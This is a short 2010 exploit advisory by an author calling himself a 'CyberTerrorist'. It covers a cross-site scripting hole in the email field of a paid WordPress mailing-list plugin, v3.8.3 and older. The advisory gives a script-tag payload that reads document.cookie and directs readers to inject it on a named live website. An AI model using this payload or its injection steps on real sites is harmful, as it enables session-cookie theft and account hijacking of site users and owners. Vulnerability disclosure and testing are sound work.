.o8 oooo o8o
"888 `888 `"'
888oooo. oooo oooo oooo d8b .oooo.o .oooo. 888 oooo
d88' `88b `888 `888 `888""8P d88( "8 `P )88b 888 `888
888 888 888 888 888 `"Y88b. .oP"888 888 888
888 888 888 888 888 o. )88b d8( 888 888 888
`Y8bod8P' `V88V"V8P' d888b 8""888P' `Y888""8o o888o o888o
########################### INFORMATIONS ###############################################
#
#
# [+] Exploit Title: WordPress Newsletter Plugin - Cross Site Scripting (XSS) Vulnerabilities
# [+] Date: 25-07-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://tribulant.com/products/view/1/wordpress-mailing-list
# [+] Price: $49.99
# [+] Version: v3.8.3 & older versions
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, DeeWayne,
# Nazrek, gf0x, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
# Dexx, enco, soulstoned, HooHead, Cyb3r P1rat, DizzY_D, Free-Hack,
# and the wh0le other morons ;D
#
#
#########################################################################################
########################## Exploit #############################
The "EMail Address"-Form is vulnerable.
Example:
Put your XSS Code into the EMail Field and add quotation mark before you XSS code. (;
Live Example:
-> Go to: http://wpml.wpplugins.biz/
-> Put that into the EMail Field: "< script>alert(document.cookie)< /script>
-> Remove spaces.
-> *-*
########################## LAST WORDS #############################
Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali
#####